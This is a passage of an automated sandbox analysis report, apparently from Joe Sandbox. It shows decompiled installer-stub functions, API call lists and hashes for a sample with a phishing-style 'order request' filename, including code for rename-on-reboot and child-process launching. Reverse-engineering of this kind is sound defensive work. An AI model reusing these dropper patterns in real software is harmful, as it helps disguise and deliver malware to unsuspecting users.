                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t108;
                                                				signed int _t110;
                                                				intOrPtr _t111;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					__eflags = _a8 - 0x111;
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						__eflags = _a8 - 0x4e;
                                                						if(_a8 != 0x4e) {
                                                							__eflags = _a8 - 0x40b;
                                                							if(_a8 == 0x40b) {
                                                								 *0x79ff0c =  *0x79ff0c + 1;
                                                								__eflags =  *0x79ff0c;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E0040415D(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                                                							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                                                							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                								_v12 = _t103;
                                                								__eflags = _t103 - _t113 - 0x800;
                                                								_v16 = _t113;
                                                								_v8 = 0x7a69e0;
                                                								if(_t103 - _t113 < 0x800) {
                                                									SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                									SetCursor(LoadCursorW(0, 0x7f02));
                                                									_t44 =  &_v8; // 0x7a69e0
                                                									ShellExecuteW(_a4, L"open",  *_t44, 0, 0, 1);
                                                									SetCursor(LoadCursorW(0, 0x7f00));
                                                									_t114 = _a16;
                                                								}
                                                							}
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                                                							goto L28;
                                                						} else {
                                                							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                                                							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                								goto L28;
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x7a8a48, 0x111, 1, 0);
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x7a8a48, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					__eflags = _a12 >> 0x10;
                                                					if(_a12 >> 0x10 != 0) {
                                                						goto L27;
                                                					}
                                                					__eflags =  *0x79ff0c; // 0x0
                                                					if(__eflags != 0) {
                                                						goto L27;
                                                					}
                                                					_t69 =  *0x7a0f18; // 0x86533c
                                                					_t29 = _t69 + 0x14; // 0x865350
                                                					_t116 = _t29;
                                                					__eflags =  *_t116 & 0x00000020;
                                                					if(( *_t116 & 0x00000020) == 0) {
                                                						goto L27;
                                                					}
                                                					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                					__eflags = _t108;
                                                					 *_t116 = _t108;
                                                					E00404118(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                					E00404526();
                                                					goto L13;
                                                				} else {
                                                					_t117 = _a16;
                                                					_t75 =  *(_t117 + 0x30);
                                                					if(_t75 < 0) {
                                                						_t111 =  *0x7a7a1c; // 0x8681a6
                                                						_t75 =  *(_t111 - 4 + _t75 * 4);
                                                					}
                                                					_t76 =  *0x7a8a78 + _t75 * 2;
                                                					_t110 =  *_t76 & 0x0000ffff;
                                                					_a8 = _t110;
                                                					_t78 =  &(_t76[1]);
                                                					_a16 = _t78;
                                                					_v16 = _t78;
                                                					_v12 = 0;
                                                					_v8 = E00404244;
                                                					if(_t110 != 2) {
                                                						_v8 = E0040420A;
                                                					}
                                                					_push( *((intOrPtr*)(_t117 + 0x34)));
                                                					_push(0x22);
                                                					E004040F6(_a4);
                                                					_push( *((intOrPtr*)(_t117 + 0x38)));
                                                					_push(0x23);
                                                					E004040F6(_a4);
                                                					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                					E00404118( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                					_t118 = GetDlgItem(_a4, 0x3e8);
                                                					E0040412B(_t118);
                                                					SendMessageW(_t118, 0x45b, 1, 0);
                                                					_t92 =  *( *0x7a8a50 + 0x68);
                                                					if(_t92 < 0) {
                                                						_t92 = GetSysColor( ~_t92);
                                                					}
                                                					SendMessageW(_t118, 0x443, 0, _t92);
                                                					SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                					 *0x79ff0c = 0;
                                                					SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                					 *0x79ff0c = 0;
                                                					return 0;
                                                				}
                                                			}

                                                APIs
                                                • CheckDlgButton.USER32 ref: 00404331
                                                • GetDlgItem.USER32 ref: 00404345
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404362
                                                • GetSysColor.USER32(?), ref: 00404373
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404381
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                • lstrlenW.KERNEL32(?), ref: 00404394
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B6
                                                • GetDlgItem.USER32 ref: 0040440F
                                                • SendMessageW.USER32(00000000), ref: 00404416
                                                • GetDlgItem.USER32 ref: 00404441
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404484
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404492
                                                • SetCursor.USER32(00000000), ref: 00404495
                                                • ShellExecuteW.SHELL32(0000070B,open,iz,00000000,00000000,00000001), ref: 004044AA
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044B6
                                                • SetCursor.USER32(00000000), ref: 004044B9
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E8
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$open$iz
                                                • API String ID: 3615053054-3184408566
                                                • Opcode ID: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
                                                • Instruction ID: f5fa6e7357a1776686f67c5c85bccc632f1e4afc8f648020f62b4c2f23f21bc2
                                                • Opcode Fuzzy Hash: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
                                                • Instruction Fuzzy Hash: CA7181B1900609BFDB109F60DD85E6A7B79FB84744F04853AF705B61E0CB789951CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405D61(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t13;
                                                				long _t25;
                                                				char* _t32;
                                                				int _t38;
                                                				void* _t39;
                                                				intOrPtr* _t40;
                                                				long _t43;
                                                				WCHAR* _t45;
                                                				void* _t47;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t53;
                                                				void* _t54;
                                                
                                                				_t39 = __ecx;
                                                				lstrcpyW(0x7a55e0, L"NUL");
                                                				_t45 =  *(_t53 + 0x18);
                                                				if(_t45 == 0) {
                                                					L3:
                                                					_t2 = _t53 + 0x1c; // 0x7a5de0
                                                					_t13 = GetShortPathNameW( *_t2, 0x7a5de0, 0x400);
                                                					if(_t13 != 0 && _t13 <= 0x400) {
                                                						_t38 = wsprintfA(0x7a51e0, "%ls=%ls\r\n", 0x7a55e0, 0x7a5de0);
                                                						_t54 = _t53 + 0x10;
                                                						E00406054(_t38, 0x400, 0x7a5de0, 0x7a5de0,  *((intOrPtr*)( *0x7a8a50 + 0x128)));
                                                						_t13 = E00405C07(0x7a5de0, 0xc0000000, 4);
                                                						_t49 = _t13;
                                                						 *(_t54 + 0x18) = _t49;
                                                						if(_t49 != 0xffffffff) {
                                                							_t43 = GetFileSize(_t49, 0);
                                                							_t6 = _t38 + 0xa; // 0xa
                                                							_t47 = GlobalAlloc(0x40, _t43 + _t6);
                                                							if(_t47 == 0 || E00405C8A(_t49, _t47, _t43) == 0) {
                                                								L18:
                                                								return CloseHandle(_t49);
                                                							} else {
                                                								if(E00405B6C(_t39, _t47, "[Rename]\r\n") != 0) {
                                                									_t50 = E00405B6C(_t39, _t22 + 0xa, "\n[");
                                                									if(_t50 == 0) {
                                                										_t49 =  *(_t54 + 0x18);
                                                										L16:
                                                										_t25 = _t43;
                                                										L17:
                                                										E00405BC2(_t25 + _t47, 0x7a51e0, _t38);
                                                										SetFilePointer(_t49, 0, 0, 0);
                                                										E00405CB9(_t49, _t47, _t43 + _t38);
                                                										GlobalFree(_t47);
                                                										goto L18;
                                                									}
                                                									_t40 = _t47 + _t43;
                                                									_t32 = _t40 + _t38;
                                                									while(_t40 > _t50) {
                                                										 *_t32 =  *_t40;
                                                										_t32 = _t32 - 1;
                                                										_t40 = _t40 - 1;
                                                									}
                                                									_t25 = _t50 - _t47 + 1;
                                                									_t49 =  *(_t54 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
                                                								_t43 = _t43 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E00405C07(_t45, 0, 1));
                                                					_t13 = GetShortPathNameW(_t45, 0x7a55e0, 0x400);
                                                					if(_t13 != 0 && _t13 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t13;
                                                			}

                                                APIs
                                                • lstrcpyW.KERNEL32 ref: 00405D70
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405EF4,?,?), ref: 00405D94
                                                • GetShortPathNameW.KERNEL32 ref: 00405D9D
                                                  • Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
                                                  • Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE
                                                • GetShortPathNameW.KERNEL32 ref: 00405DBA
                                                • wsprintfA.USER32 ref: 00405DD8
                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DE0,C0000000,00000004,007A5DE0,?), ref: 00405E13
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405E22
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405E5A
                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,007A51E0,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB0
                                                • GlobalFree.KERNEL32 ref: 00405EC1
                                                • CloseHandle.KERNEL32(00000000), ref: 00405EC8
                                                  • Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                  • Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]$Uz$]z$]z
                                                • API String ID: 222337774-2882615421
                                                • Opcode ID: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
                                                • Instruction ID: 75cee4360bd3bcd07888cd864a4516e3a0162a31efabfd5f0f4b5e85420b189e
                                                • Opcode Fuzzy Hash: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
                                                • Instruction Fuzzy Hash: 6C31F370600B14BBD2216B219D49F6B3E6CDF45755F14043AFA81F62D2DA3CEA018EAD
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x7a8a50;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, "Overcaustically Setup", 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a48;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,Overcaustically Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$Overcaustically Setup
                                                • API String ID: 941294808-1772504776
                                                • Opcode ID: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
                                                • Instruction ID: de39ae593db74bf8e739f7026f96e360392c145d264594217dd326fc860e90c0
                                                • Opcode Fuzzy Hash: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
                                                • Instruction Fuzzy Hash: E2418C71800209AFCF058F95DE459AFBBB9FF45310F00842EF991AA1A0CB38DA54DFA4
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E007E194F() {
                                                				long _v8;
                                                				struct _PROCESS_INFORMATION _v24;
                                                				struct _STARTUPINFOW _v92;
                                                				char _v2138;
                                                				short _v2140;
                                                				WCHAR* _t24;
                                                				WCHAR* _t25;
                                                				int _t26;
                                                				signed int _t34;
                                                				short _t36;
                                                				short _t37;
                                                				void* _t43;
                                                
                                                				_t34 = 0x10;
                                                				memset( &(_v92.lpReserved), 0, _t34 << 2);
                                                				_v24.hProcess = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_v92.cb = 0x44;
                                                				_t43 = 0x20;
                                                				lstrcpynW( &_v2140, GetCommandLineW(), 0x400);
                                                				_t24 =  &_v2140;
                                                				if(_v2140 == 0x22) {
                                                					_t24 =  &_v2138;
                                                					_t43 = 0x22;
                                                				}
                                                				while(1) {
                                                					_t36 =  *_t24;
                                                					if(_t36 == 0) {
                                                						break;
                                                					}
                                                					if(_t36 == _t43) {
                                                						break;
                                                					}
                                                					_t24 = CharNextW(_t24);
                                                				}
                                                				_t25 = CharNextW(_t24);
                                                				while(1) {
                                                					_t37 =  *_t25;
                                                					if(_t37 == 0) {
                                                						break;
                                                					}
                                                					if(_t37 != 0x20) {
                                                						break;
                                                					}
                                                					_t25 =  &(_t25[1]);
                                                				}
                                                				_t26 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v24);
                                                				_v8 = _t26;
                                                				if(_t26 == 0) {
                                                					ExitProcess(0xc000001d);
                                                				}
                                                				WaitForSingleObject(_v24.hProcess, 0xffffffff);
                                                				GetExitCodeProcess(_v24.hProcess,  &_v8);
                                                				CloseHandle(_v24);
                                                				CloseHandle(_v24.hThread);
                                                				ExitProcess(_v8);
                                                			}

                                                APIs
                                                • GetCommandLineW.KERNEL32(00000400), ref: 007E197F
                                                • lstrcpynW.KERNEL32(?,00000000), ref: 007E198D
                                                • CharNextW.USER32(00000022), ref: 007E19BA
                                                • CharNextW.USER32(00000022), ref: 007E19C5
                                                • CreateProcessW.KERNEL32 ref: 007E19EA
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007E19FC
                                                • GetExitCodeProcess.KERNEL32 ref: 007E1A09
                                                • CloseHandle.KERNEL32(?), ref: 007E1A18
                                                • CloseHandle.KERNEL32(?), ref: 007E1A1D
                                                • ExitProcess.KERNEL32 ref: 007E1A22
                                                • ExitProcess.KERNEL32 ref: 007E1A2D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                • String ID: "$D
                                                • API String ID: 3771911414-1154559923
                                                • Opcode ID: d6b924d6c731369243db0f68181227ef16f1c75a436691a70405be8fb5f9306d
                                                • Instruction ID: 7356d163703bab96d61bf0c0f7e4958a51424e7ebafe37103fd070a19ce3aec8
                                                • Opcode Fuzzy Hash: d6b924d6c731369243db0f68181227ef16f1c75a436691a70405be8fb5f9306d
                                                • Instruction Fuzzy Hash: 6A217F7180118DBEDB10EBD5CC99AEFBB7DEB08315F904066E202BA0A1DB741E45DB65
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E100022D0(void* __edx) {
                                                				void* _t38;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t42;
                                                				signed int* _t43;
                                                				signed int* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[6];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t42 = 0x1a;
                                                					if(_t52 == _t42) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[6] = _t42;
                                                							goto L12;
                                                						} else {
                                                							_t38 = E100012BA(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t38 = E10001243();
                                                						L11:
                                                						_t52 = _t38;
                                                						L12:
                                                						_t13 =  &(_t51[2]); // 0x1020
                                                						_t43 = _t13;
                                                						if(_t51[1] != 0xffffffff) {
                                                						}
                                                						_t39 =  *_t51;
                                                						_t51[7] = _t51[7] & 0x00000000;
                                                						if(_t39 > 7) {
                                                							L27:
                                                							_t40 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t40;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
                                                								case 0:
                                                									 *_t43 =  *_t43 & 0x00000000;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E10001311(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E10001311(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E1000122C(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if(lstrlenW(__ebp) > 0) {
                                                										__eax = E10001311(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t38 = E1000122C(0x10004044);
                                                					goto L10;
                                                				}
			}

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 10002416
                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @h)w
                                                • API String ID: 4216380887-1991468749
                                                • Opcode ID: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                • Opcode Fuzzy Hash: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
			// Filename/path sanitiser. Editor's reading of the decompile: the logic matches the
			// NSIS installer stub's validate_filename() (assessment; the report itself does not
			// identify the packer). Subcalls E00405A5D, E00405A13 and E00405BC2 are not shown
			// here, so their roles noted below are inferred from how they are used.
			E004062C6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				// Skip a leading "\\?\" extended-length prefix (0x5c = '\\', 0x3f = '?').
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				// If the string starts with a path spec (inferred: "X:" or "\\"), leave its first
				// two characters untouched so the ':' is not removed by the filter below.
				if( *_t20 != 0 && E00405A5D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;   // start of the editable region; lower bound for the trailing trim
				_t19 = _t20;   // write cursor; the string is compacted in place
				if(_t5 != 0) {
					do {
						// Keep a character only if it is not a control character (> 0x1f) and
						// E00405A13 (inferred: find-char) does not locate it in the set  *?|<>/":
						// Note that the backslash is not in that set and therefore survives.
						if(_t5 > 0x1f &&  *((short*)(E00405A13(L"*?|<>/\":", _t5))) == 0) {
							E00405BC2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);   // inferred: copy one character (byte length >> 1 = WCHAR count)
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;   // terminate the compacted string
				// Erase trailing spaces (0x20) and backslashes (0x5c), never stepping before _t21.
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

                                                APIs
                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406329
                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
